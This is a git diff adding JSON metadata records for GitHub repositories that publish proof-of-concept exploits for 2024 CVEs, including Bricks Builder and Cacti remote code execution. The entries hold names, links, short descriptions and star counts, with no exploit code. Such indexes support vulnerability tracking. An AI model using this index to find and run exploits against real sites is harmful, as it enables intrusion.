"2024-02-17T12:10:12Z", + "updated_at": "2024-02-17T12:10:13Z", + "pushed_at": "2024-02-17T12:10:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25280.json b/2024/CVE-2024-25280.json new file mode 100644 index 0000000000..102453d1c5 --- /dev/null +++ b/2024/CVE-2024-25280.json @@ -0,0 +1,33 @@ +[ + { + "id": 758900244, + "name": "CVE-2024-25280", + "full_name": "sajaljat\/CVE-2024-25280", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25280", + "description": "Broken Access control", + "fork": false, + "created_at": "2024-02-17T12:11:58Z", + "updated_at": "2024-02-17T12:13:43Z", + "pushed_at": "2024-02-17T12:13:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25281.json b/2024/CVE-2024-25281.json new file mode 100644 index 0000000000..1c56297b18 --- /dev/null +++ b/2024/CVE-2024-25281.json @@ -0,0 +1,33 @@ +[ + { + "id": 758901138, + "name": "CVE-2024-25281", + "full_name": "sajaljat\/CVE-2024-25281", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25281", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-17T12:14:56Z", + "updated_at": "2024-02-17T12:14:56Z", + "pushed_at": "2024-02-17T12:15:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25291.json b/2024/CVE-2024-25291.json new file mode 100644 index 0000000000..f5bc807523 --- /dev/null +++ b/2024/CVE-2024-25291.json @@ -0,0 +1,33 @@ +[ + { + "id": 853174873, + "name": "CVE-2024-25291", + "full_name": "EQSTLab\/CVE-2024-25291", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-25291", + "description": "PoC for CVE-2024-25291", + "fork": false, + "created_at": "2024-09-06T06:15:35Z", + "updated_at": "2024-09-06T06:15:54Z", + "pushed_at": "2024-09-06T06:15:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25292.json b/2024/CVE-2024-25292.json new file mode 100644 index 0000000000..2e54989c5e --- /dev/null +++ b/2024/CVE-2024-25292.json @@ -0,0 +1,33 @@ +[ + { + "id": 853175170, + "name": "CVE-2024-25292", + "full_name": "EQSTLab\/CVE-2024-25292", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-25292", + "description": "PoC for CVE-2024-25292", + "fork": false, + "created_at": "2024-09-06T06:16:29Z", + "updated_at": "2024-12-09T03:47:34Z", + "pushed_at": "2024-11-12T12:32:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25293.json b/2024/CVE-2024-25293.json new file mode 100644 index 0000000000..72c3695972 --- /dev/null +++ b/2024/CVE-2024-25293.json @@ -0,0 +1,33 @@ +[ + { + "id": 853173826, + "name": "CVE-2024-25293", + "full_name": "EQSTLab\/CVE-2024-25293", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-25293", + "description": "PoC for CVE-2024-25293", + "fork": false, + "created_at": "2024-09-06T06:12:32Z", + "updated_at": "2024-09-06T06:12:58Z", + "pushed_at": "2024-09-06T06:12:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25376.json b/2024/CVE-2024-25376.json new file mode 100644 index 0000000000..05a3e6cad5 --- /dev/null +++ b/2024/CVE-2024-25376.json @@ -0,0 +1,33 @@ +[ + { + "id": 762642991, + "name": "CVE-2024-25376-POC", + "full_name": "ewilded\/CVE-2024-25376-POC", + "owner": { + "login": "ewilded", + "id": 1158719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4", + "html_url": "https:\/\/github.com\/ewilded", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ewilded\/CVE-2024-25376-POC", + "description": "CVE-2024-25376 - Local Privilege Escalation in TUSBAudio", + "fork": false, + "created_at": "2024-02-24T09:30:45Z", + "updated_at": "2024-11-15T17:11:10Z", + "pushed_at": "2024-02-24T09:33:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25381.json b/2024/CVE-2024-25381.json new file mode 100644 index 0000000000..a1412620c0 --- /dev/null +++ b/2024/CVE-2024-25381.json @@ -0,0 +1,33 @@ +[ + { + "id": 751326986, + "name": "CVE-2024-25381", + "full_name": "Ox130e07d\/CVE-2024-25381", + "owner": { + "login": "Ox130e07d", + "id": 108753162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108753162?v=4", + "html_url": "https:\/\/github.com\/Ox130e07d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ox130e07d\/CVE-2024-25381", + "description": null, + "fork": false, + "created_at": "2024-02-01T11:42:48Z", + "updated_at": "2024-02-20T08:36:47Z", + "pushed_at": "2024-02-23T05:48:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25411.json b/2024/CVE-2024-25411.json new file mode 100644 index 0000000000..6246fc9481 --- /dev/null +++ b/2024/CVE-2024-25411.json @@ -0,0 +1,33 @@ +[ + { + "id": 864159582, + "name": "CVE-2024-25411", + "full_name": "paragbagul111\/CVE-2024-25411", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-25411", + "description": "A cross-site scripting (XSS) vulnerability in Flatpress v1.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username parameter in setup.php", + "fork": false, + "created_at": "2024-09-27T15:49:08Z", + "updated_at": "2024-09-27T16:02:54Z", + "pushed_at": "2024-09-27T16:02:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25412.json b/2024/CVE-2024-25412.json new file mode 100644 index 0000000000..53e2ae5ce7 --- /dev/null +++ b/2024/CVE-2024-25412.json @@ -0,0 +1,33 @@ +[ + { + "id": 864170495, + "name": "CVE-2024-25412", + "full_name": "paragbagul111\/CVE-2024-25412", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-25412", + "description": "A cross-site scripting (XSS) vulnerability in Flatpress v1.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email field", + "fork": false, + "created_at": "2024-09-27T16:13:26Z", + "updated_at": "2024-09-27T16:26:11Z", + "pushed_at": "2024-09-27T16:26:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25423.json b/2024/CVE-2024-25423.json new file mode 100644 index 0000000000..8291bab689 --- /dev/null +++ b/2024/CVE-2024-25423.json @@ -0,0 +1,33 @@ +[ + { + "id": 759283387, + "name": "cve-2024-25423", + "full_name": "DriverUnload\/cve-2024-25423", + "owner": { + "login": "DriverUnload", + "id": 83060593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83060593?v=4", + "html_url": "https:\/\/github.com\/DriverUnload", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DriverUnload\/cve-2024-25423", + "description": "Cinema 4D out-of-bounds write vulnerability when parsing c4d files", + "fork": false, + "created_at": "2024-02-18T06:35:31Z", + "updated_at": "2024-02-18T07:10:42Z", + "pushed_at": "2024-02-18T07:06:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25466.json b/2024/CVE-2024-25466.json new file mode 100644 index 0000000000..a6dc330dcf --- /dev/null +++ b/2024/CVE-2024-25466.json @@ -0,0 +1,33 @@ +[ + { + "id": 757892016, + "name": "CVE-2024-25466", + "full_name": "FixedOctocat\/CVE-2024-25466", + "owner": { + "login": "FixedOctocat", + "id": 43385721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43385721?v=4", + "html_url": "https:\/\/github.com\/FixedOctocat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FixedOctocat\/CVE-2024-25466", + "description": "Description for CVE-2024-25466", + "fork": false, + "created_at": "2024-02-15T07:47:14Z", + "updated_at": "2024-02-15T07:47:14Z", + "pushed_at": "2024-02-15T12:41:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25503.json b/2024/CVE-2024-25503.json new file mode 100644 index 0000000000..5c519dd83a --- /dev/null +++ b/2024/CVE-2024-25503.json @@ -0,0 +1,33 @@ +[ + { + "id": 853175455, + "name": "CVE-2024-25503", + "full_name": "EQSTLab\/CVE-2024-25503", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-25503", + "description": "PoC for CVE-2024-25503", + "fork": false, + "created_at": "2024-09-06T06:17:18Z", + "updated_at": "2024-09-06T06:17:39Z", + "pushed_at": "2024-09-06T06:17:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25600.json b/2024/CVE-2024-25600.json new file mode 100644 index 0000000000..289c6a9ec8 --- /dev/null +++ b/2024/CVE-2024-25600.json @@ -0,0 +1,392 @@ +[ + { + "id": 760768451, + "name": "CVE-2024-25600", + "full_name": "Chocapikk\/CVE-2024-25600", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-25600", + "description": "Unauthenticated Remote Code Execution – Bricks <= 1.9.6", + "fork": false, + "created_at": "2024-02-20T20:16:09Z", + "updated_at": "2025-01-07T09:32:55Z", + "pushed_at": "2024-02-25T21:50:09Z", + "stargazers_count": 155, + "watchers_count": 155, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 33, + "watchers": 155, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 760947792, + "name": "CVE-2024-25600_Nuclei-Template", + "full_name": "Christbowel\/CVE-2024-25600_Nuclei-Template", + "owner": { + "login": "Christbowel", + "id": 96427513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96427513?v=4", + "html_url": "https:\/\/github.com\/Christbowel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Christbowel\/CVE-2024-25600_Nuclei-Template", + "description": "Nuclei template and information about the POC for CVE-2024-25600", + "fork": false, + "created_at": "2024-02-21T00:27:33Z", + "updated_at": "2024-12-18T06:02:48Z", + "pushed_at": "2024-02-21T02:11:08Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 761713470, + "name": "CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "full_name": "Tornad0007\/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "owner": { + "login": "Tornad0007", + "id": 93181695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93181695?v=4", + "html_url": "https:\/\/github.com\/Tornad0007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tornad0007\/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "description": "This tool is designed to exploit the CVE-2024-25600 vulnerability found in the Bricks Builder plugin for WordPress. The vulnerability allows for unauthenticated remote code execution on affected websites. The tool automates the exploitation process by retrieving nonces and sending specially crafted requests to execute arbitrary commands.", + "fork": false, + "created_at": "2024-02-22T10:53:45Z", + "updated_at": "2024-12-03T15:07:31Z", + "pushed_at": "2024-02-22T10:54:26Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 765397075, + "name": "CVE-2024-25600-wordpress-Exploit-RCE", + "full_name": "hy011121\/CVE-2024-25600-wordpress-Exploit-RCE", + "owner": { + "login": "hy011121", + "id": 75035965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75035965?v=4", + "html_url": "https:\/\/github.com\/hy011121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hy011121\/CVE-2024-25600-wordpress-Exploit-RCE", + "description": "(Mirorring)", + "fork": false, + "created_at": "2024-02-29T20:53:42Z", + "updated_at": "2024-06-16T18:49:22Z", + "pushed_at": "2024-02-29T21:04:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765618070, + "name": "CVE-2024-25600-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-25600-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-25600-EXPLOIT", + "description": "A PoC exploit for CVE-2024-25600 - WordPress Bricks Builder Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-03-01T09:28:08Z", + "updated_at": "2024-12-01T08:46:11Z", + "pushed_at": "2024-03-01T09:46:56Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bricks-builder", + "cve-2024-25600", + "educational", + "exploit", + "exploitation", + "exploits", + "hacking", + "poc", + "rce", + "remote-code-execution", + "security-research", + "security-researcher", + "vulnerabilities", + "vulnerability", + "word", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 7, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789293414, + "name": "WORDPRESS-CVE-2024-25600-EXPLOIT-RCE", + "full_name": "X-Projetion\/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE", + "description": "WORDPRESS-CVE-2024-25600-EXPLOIT-RCE - WordPress Bricks Builder Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-04-20T06:36:22Z", + "updated_at": "2024-04-20T06:52:25Z", + "pushed_at": "2024-04-20T06:37:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801882404, + "name": "CVE-2024-25600-mass", + "full_name": "svchostmm\/CVE-2024-25600-mass", + "owner": { + "login": "svchostmm", + "id": 169925884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169925884?v=4", + "html_url": "https:\/\/github.com\/svchostmm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/svchostmm\/CVE-2024-25600-mass", + "description": null, + "fork": false, + "created_at": "2024-05-17T05:23:51Z", + "updated_at": "2024-05-17T05:23:51Z", + "pushed_at": "2024-05-05T02:22:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 809314858, + "name": "0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "full_name": "ivanbg2004\/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "owner": { + "login": "ivanbg2004", + "id": 124943966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124943966?v=4", + "html_url": "https:\/\/github.com\/ivanbg2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ivanbg2004\/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "description": "0BL1V10N's CVE-2024-25600 for Bricks Builder (TryHackMe) plugin for WordPress exploit", + "fork": false, + "created_at": "2024-06-02T10:49:03Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-06-02T11:12:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811133087, + "name": "CVE-2024-25600", + "full_name": "k3lpi3b4nsh33\/CVE-2024-25600", + "owner": { + "login": "k3lpi3b4nsh33", + "id": 118002757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4", + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-25600", + "description": null, + "fork": false, + "created_at": "2024-06-06T02:13:06Z", + "updated_at": "2024-06-06T02:36:13Z", + "pushed_at": "2024-06-06T02:36:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811160191, + "name": "CVE-2024-25600", + "full_name": "WanLiChangChengWanLiChang\/CVE-2024-25600", + "owner": { + "login": "WanLiChangChengWanLiChang", + "id": 171075497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4", + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-25600", + "description": null, + "fork": false, + "created_at": "2024-06-06T03:59:06Z", + "updated_at": "2024-06-07T17:15:46Z", + "pushed_at": "2024-06-07T17:15:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835649473, + "name": "CVE-2024-25600-Bricks-Builder-WordPress", + "full_name": "KaSooMi0228\/CVE-2024-25600-Bricks-Builder-WordPress", + "owner": { + "login": "KaSooMi0228", + "id": 171640266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171640266?v=4", + "html_url": "https:\/\/github.com\/KaSooMi0228", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaSooMi0228\/CVE-2024-25600-Bricks-Builder-WordPress", + "description": null, + "fork": false, + "created_at": "2024-07-30T09:02:31Z", + "updated_at": "2024-07-30T09:04:34Z", + "pushed_at": "2024-07-30T09:04:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 845015155, + "name": "CVE-2024-25600", + "full_name": "wh6amiGit\/CVE-2024-25600", + "owner": { + "login": "wh6amiGit", + "id": 121056021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121056021?v=4", + "html_url": "https:\/\/github.com\/wh6amiGit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wh6amiGit\/CVE-2024-25600", + "description": "Unauthenticated Remote Code Execution – Bricks", + "fork": false, + "created_at": "2024-08-20T12:18:58Z", + "updated_at": "2024-08-20T14:40:21Z", + "pushed_at": "2024-08-20T13:57:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25641.json b/2024/CVE-2024-25641.json new file mode 100644 index 0000000000..9ac5ad325d --- /dev/null +++ b/2024/CVE-2024-25641.json @@ -0,0 +1,205 @@ +[ + { + "id": 847752853, + "name": "CVE-2024-25641", + "full_name": "5ma1l\/CVE-2024-25641", + "owner": { + "login": "5ma1l", + "id": 111578568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111578568?v=4", + "html_url": "https:\/\/github.com\/5ma1l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5ma1l\/CVE-2024-25641", + "description": "This repository automates the process of exploiting CVE-2024-25641 on Cacti 1.2.26", + "fork": false, + "created_at": "2024-08-26T13:34:35Z", + "updated_at": "2024-12-25T14:04:12Z", + "pushed_at": "2024-09-05T11:52:22Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "cacti", + "cve-2024-25641", + "exploit", + "penetration-testing", + "python3" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848016259, + "name": "CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26", + "full_name": "thisisveryfunny\/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26", + "owner": { + "login": "thisisveryfunny", + "id": 179417827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179417827?v=4", + "html_url": "https:\/\/github.com\/thisisveryfunny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thisisveryfunny\/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26", + "description": "CVE-2024-25641 - RCE Automated Exploit - Cacti 1.2.26", + "fork": false, + "created_at": "2024-08-27T01:19:25Z", + "updated_at": "2024-11-20T16:31:02Z", + "pushed_at": "2024-08-28T18:46:58Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848376459, + "name": "CVE-2024-25641", + "full_name": "Safarchand\/CVE-2024-25641", + "owner": { + "login": "Safarchand", + "id": 38681779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38681779?v=4", + "html_url": "https:\/\/github.com\/Safarchand", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Safarchand\/CVE-2024-25641", + "description": "PoC for CVE-2024-25641 Authenticated RCE on Cacti v1.2.26", + "fork": false, + "created_at": "2024-08-27T16:41:39Z", + "updated_at": "2024-12-19T04:56:26Z", + "pushed_at": "2024-09-01T04:05:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "cve-2024-25641", + "exploit", + "explotation", + "poc", + "proof-of-concept", + "python3", + "rce", + "rce-exploit" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849191274, + "name": "CVE-2024-25641-CACTI-RCE-1.2.26", + "full_name": "StopThatTalace\/CVE-2024-25641-CACTI-RCE-1.2.26", + "owner": { + "login": "StopThatTalace", + "id": 117742366, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117742366?v=4", + "html_url": "https:\/\/github.com\/StopThatTalace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StopThatTalace\/CVE-2024-25641-CACTI-RCE-1.2.26", + "description": "Fully automated PoC - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵", + "fork": false, + "created_at": "2024-08-29T06:27:25Z", + "updated_at": "2024-12-08T16:09:09Z", + "pushed_at": "2024-09-03T05:21:04Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892647431, + "name": "cve-2024-25641-poc", + "full_name": "XiaomingX\/cve-2024-25641-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-25641-poc", + "description": "PoC for CVE-2024-25641 Authenticated RCE on Cacti v1.2.26", + "fork": false, + "created_at": "2024-11-22T14:05:37Z", + "updated_at": "2024-12-08T18:37:24Z", + "pushed_at": "2024-11-22T14:09:15Z", + "stargazers_count": 2, + "watchers_count": 2, + 